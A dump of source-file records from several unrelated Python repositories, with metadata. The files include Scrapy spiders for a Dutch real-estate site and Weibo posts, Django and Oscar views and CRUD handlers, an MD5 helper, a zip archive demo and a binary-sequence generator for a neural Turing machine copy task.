501b7ba29fefd8949010e4dc7ee43221b2c0a645
|
[] |
no_license
|
velibor7/real_estate_nt
|
98e31e06ffaecfe8fdbf960fd7a6f259a1f8f41e
|
c470e47ec160d83436e5f845674ecc9ef63e9cfa
|
refs/heads/master
| 2023-02-09T10:36:36.261055
| 2021-01-03T18:58:52
| 2021-01-03T18:58:52
| 326,479,570
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,213
|
py
|
import scrapy
from ..items import RealestateItem
class VandewaterSpider(scrapy.Spider):
name = 'vandewater'
start_urls = ['https://vandewatergroep.nl/bestaande-woningen/#q1bKzs8vyCgtLVKyAjOVdMBUQVFmVrGSVbVSbmIFUMbI3NTAwECpVkcpvygltSipEihWXJJYUlpslVicrFQLAA/']
def parse(self, response):
for href in response.xpath('//*[(@id = "entity-items")]//*[contains(@class, "overlay")]/@href'):
url = response.urljoin(href.get())
print(f"Scraping url: {url}")
yield scrapy.Request(url, callback=self.parse_item)
def parse_item(self, response):
item = RealestateItem()
print(f"Item keys: {item.fields}")
item['title'] = response.xpath('//h1/text()').get()
for row in response.xpath('//div[contains(@class, "container")]//li[contains(@class, "clearfix")]'):
key = row.xpath('./strong//text()').get().lower().replace(' ', '_')
val = row.xpath('./span//text()').get()
# adding just the items we defined we want in items
for k in item.fields:
# print(f"Key in second loop: {k}")
if key == k:
item[key] = val
yield item
|
[
"veliborvasiljevic7@gmail.com"
] |
veliborvasiljevic7@gmail.com
|
e91d2e3690a2450a3223f4190a553e6b502a4342
|
dbe5973d69df9c5a5f3b06b7451a0de7086ebda4
|
/myapps/catalogue/views.py
|
344f4fb57000ed997cba4f2d20828f35255ffc33
|
[] |
no_license
|
phares/mall
|
29e7c0fdf3222a05161de36c8252167ab59df7be
|
d3f0093828c892ce46d55afaa245e5780555cc68
|
refs/heads/master
| 2021-01-22T23:53:27.535609
| 2017-04-30T09:17:53
| 2017-04-30T09:17:53
| 85,676,779
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,009
|
py
|
from django.utils.translation import ugettext_lazy as _
from django.core.paginator import EmptyPage, InvalidPage
from oscar.apps.catalogue.views import CatalogueView
class BrandsView(CatalogueView):
"""
Browse all products by a brand in the catalogue
"""
def get(self, request, *args, **kwargs):
try:
self.search_handler = self.get_search_handler(
self.request.GET, request.get_full_path(), [], brand=kwargs["brand"])
except InvalidPage:
# Redirect to page one.
messages.error(request, _('The given page number was invalid.'))
return redirect('catalogue:index')
return super(CatalogueView, self).get(request, *args, **kwargs)
def get_context_data(self, **kwargs):
ctx = {}
ctx['summary'] = _("All products of a brand")
search_context = self.search_handler.get_search_context_data(
self.context_object_name)
ctx.update(search_context)
return ctx
|
[
"cndeti@gmail.com"
] |
cndeti@gmail.com
|
1bdfb69445257f436469696d3a49af63019ffb14
|
12015a25b4aae78d8d12776a2244e8f6426cdae6
|
/ArticleSpider/utils/common.py
|
f2b0d63bcd3b3caa2217a6a50abf9154cb2fe285
|
[] |
no_license
|
Hezier1223/ArticleSpider
|
1947ffae7176e99a3ab9d6a9c3961b2bd3b5691a
|
058587b3af25f2531316e8a1aaf0800494175795
|
refs/heads/master
| 2021-05-08T18:52:19.741073
| 2018-02-04T05:51:46
| 2018-02-04T05:51:46
| 119,539,819
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 277
|
py
|
# Created by Max on 2/3/18
__author__ = 'Max'
import hashlib
def get_md5(url):
if isinstance(url, str):
url = url.encode('utf-8')
m = hashlib.md5()
m.update(url)
return m.hexdigest()
if __name__ == '__main__':
print(get_md5('http://baidu.com'))
|
[
"arthur_zzh@126.com"
] |
arthur_zzh@126.com
|
3c31d12e488f49b753e915f610249d7d26a46a64
|
6d14de277ffc1d9d4637ca801c3bb95e46e6ad30
|
/data/gen_data_copy.py
|
2cf9917357362be877875b9c0a7e60e07bb7e486
|
[
"BSD-3-Clause"
] |
permissive
|
marcwww/pytorch-ntm
|
db7534b25a3709eedf5f9158c4bbca2032e28bcf
|
29c015f8fb7e1f33b99f6a1763daa64238297113
|
refs/heads/master
| 2021-07-18T08:19:59.176628
| 2018-08-17T07:23:29
| 2018-08-17T07:23:29
| 132,915,671
| 0
| 0
| null | 2018-05-10T14:56:56
| 2018-05-10T14:56:56
| null |
UTF-8
|
Python
| false
| false
| 1,421
|
py
|
import torch
import random
from torch.autograd import Variable
import numpy as np
import params
import pickle
def gen(num_batches,
batch_size,
seq_width,
min_len,
max_len):
"""Generator of random sequences for the copy task.
Creates random batches of "bits" sequences.
All the sequences within each batch have the same length.
The length is [`min_len`, `max_len`]
:param num_batches: Total number of batches to generate.
:param seq_width: The width of each item in the sequence.
:param batch_size: Batch size.
:param min_len: Sequence minimum length.
:param max_len: Sequence maximum length.
NOTE: The input width is `seq_width + 1`, the additional input
contain the delimiter.
"""
for batch_num in range(num_batches):
# All batches have the same sequence length
seq_len = random.randint(min_len, max_len)
seq = np.random.binomial(1, 0.5, (seq_len, batch_size, seq_width))
seq = Variable(torch.from_numpy(seq))
# The input includes an additional channel used for the delimiter
inp = Variable(torch.zeros(seq_len + 1, batch_size, seq_width + 1))
inp[:seq_len, :, :seq_width] = seq
inp[seq_len, :, seq_width] = 1.0 # delimiter in our control channel
outp = seq.clone()
yield batch_num+1, inp.float().to(params.device), outp.float().to(params.device)
|
[
"474733787@qq.com"
] |
474733787@qq.com
|
789e6a6beda64793aed4cd190b26fef917ac5f1d
|
d13dfa83589ffdae4c6d43b0f6d678a1b0ac7a74
|
/Advanced/use_zip.py
|
2c551f3dadc2860db78ec7f4adb6d8d266f84ed1
|
[] |
no_license
|
aiden-dai/ai-python3
|
fbe4926250415fd576d8dd659b28332265a62472
|
41af446e632dcb91625605022919d9ceeda09997
|
refs/heads/master
| 2021-01-01T02:23:15.524141
| 2020-07-26T07:47:20
| 2020-07-26T07:47:20
| 239,138,124
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 249
|
py
|
from zipfile import ZipFile
import os
os.chdir('Data')
# Test archive
with ZipFile('test.zip', 'w') as myzip:
myzip.write('bank.csv', arcname='Bank.dat')
# Test extract
with ZipFile('test.zip', 'r') as myzip:
myzip.extractall(path='.')
|
[
"aiden.dai@gmail.com"
] |
aiden.dai@gmail.com
|
757fed9d12e967d8249afc838ac03799bae3aab4
|
95761ba9ca92c9bf68f3fb88524ee01ddba9b314
|
/api-web/src/www/application/modules/board_tag/handlers.py
|
1d8c20aa814b1c2ce2b59d7ca971e6b8158c6e93
|
[] |
no_license
|
duytran92-cse/nas-workboard
|
918adf4b976f04a13dc756f8dc32aecf397c6258
|
bebe7674a7c6e8a3776264f18a3b7ca6b417dc7e
|
refs/heads/master
| 2022-10-23T01:02:39.583449
| 2020-06-14T19:25:01
| 2020-06-14T19:25:01
| 272,268,882
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,321
|
py
|
from django.contrib.humanize.templatetags.humanize import naturaltime
from notasquare.urad_api import *
from application.models import *
from application import constants
from application.modules.common import helpers
class List(handlers.standard.ListHandler):
def create_query(self, data):
query = BoardTag.objects
board_id = data.get('board_id', 0)
query = query.filter(board_id=board_id)
if data.get('text', '') != '' :
query = query.filter(name__contains=data['text'])
return query
def serialize_entry(self, board_tag):
return {
'id': board_tag.id,
'board_id': board_tag.board_id,
'name': board_tag.name,
'icon': board_tag.icon,
'is_visible': board_tag.is_visible
}
class Get(handlers.standard.GetHandler):
def get_data(self, data):
board_tag = BoardTag.objects.get(pk=data['id'])
return {
'id': board_tag.id,
'board_id': board_tag.board_id,
'name': board_tag.name,
'icon': board_tag.icon,
'is_visible': board_tag.is_visible
}
class Create(handlers.standard.CreateHandler):
def create(self, data):
tag = BoardTag()
tag.board_id = data.get('board_id', 0)
if data.get('name', ''):
tag.name = data.get('name', '')
if data.get('icon', 'zmdi zmdi-more'):
tag.icon = data.get('icon', 'zmdi zmdi-more')
if data.get('is_visible', True):
tag.is_visible = data.get('is_visible', True)
tag.save()
return tag
class Update(handlers.standard.UpdateHandler):
def update(self, data):
tag = BoardTag.objects.get(pk=data['id'])
if data.get('name', ''):
tag.name = data.get('name', '')
if data.get('icon', 'zmdi zmdi-more'):
tag.icon = data.get('icon', 'zmdi zmdi-more')
if data.get('is_visible', True):
tag.is_visible = data.get('is_visible', True)
tag.save()
return tag
class Delete(handlers.standard.DeleteHandler):
def delete(self, data):
tag = BoardTag.objects.get(pk=data['id'])
tag.delete()
return 1
|
[
"thanh.tran@etudiant.univ-lr.fr"
] |
thanh.tran@etudiant.univ-lr.fr
|
95603aa12d1bbc1868eb49a31aabadff865cf2f3
|
872846a41b967f0539ddd6c21d514ceea3f43e56
|
/weibosearch/spiders/weibo.py
|
ed0aff107aab5757b69e75ef96219b6b78a0e4b3
|
[] |
no_license
|
wangjinliang1991/weibo_gupiao_scrapy_tushare
|
d3f414cbdb1f5526c07d499cd38f6dd8268683d3
|
cd19620360d06d03bfa37e3a92808b8db706f5ac
|
refs/heads/master
| 2020-04-02T05:47:57.885142
| 2018-10-22T23:29:37
| 2018-10-22T23:29:37
| 154,106,072
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,617
|
py
|
# -*- coding: utf-8 -*-
import re
from urllib import response
from urllib.request import Request
from weibosearch.items import *
import scrapy
from scrapy import FormRequest, Spider
import tushare as ts
class WeiboSpider(scrapy.Spider):
name = 'weibo'
allowed_domains = ['weibo.cn']
search_url = 'https://weibo.cn/search/mblog'
max_page = 100
def start(self):
result = ts.get_hs300s()
keywords = result['code'].tolist()
for keyword in keywords:
url = '{url}?keyword={keyword}.format(url=self.search_url,keyword=keyword)'
for page in range(self.max_page+1):
data = {
'mp': str(self.max_page),
'page': str(page)
}
yield FormRequest(url, callback=self.parse_index,meta={'keyword': response.meta['keyword']},formdata=data)
def parse_index(self,response):
# print(response.text)
weibos = response.xpath('//div[@class="c" and contains(@id, "M_")]')
print(weibos)
for weibo in weibos:
is_forward = bool(weibo.xpath('.//span[@class="cmt"]').extract_first())
if is_forward:
detail_url = weibo.xpath('.//a[contains(., "原文评论[")]//@href').extract_first()
else:
detail_url = weibo.xpath('.//a[contains(., "评论[")]//@href').extract_first()
print(detail_url)
yield Request(detail_url,callback=self.parse_detail)
def parse_detail(self,response):
id = re.search('comment\/(.*?)\?',response.url).group(1)
url = response.url
content = ''.join(response.xpath('//div[@id="M_"]//span[@class="ctt"]//text()').extract())
print(id,url,content)
comment_count = response.xpath('//span[@class="pms"]//text()').re_first('评论\[(.*)]')
forward_count = response.xpath('//a[contains(.,"转发[")]//text()').re_first('转发\[.*]')
like_count = response.xpath('//a[contains(.,"赞[")]').re_first('赞\[(.*)]')
print(comment_count,forward_count,like_count)
posted_at = response.xpath('//div[@id="M_"]//span[@class="ct"]//text()').extract_first(default=None)
user = response.xpath('//div[@id="M_"]/div[1]/a/text()').extract_first(default=None)
keyword = response.meta['keyword']
weibo_item = WeiboItem()
for field in weibo_item.fields:
try:
weibo_item[field] = eval(field)
except NameError:
self.logger.debug("Field is not defined" + field)
yield weibo_item
|
[
"632180350@qq.com"
] |
632180350@qq.com
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.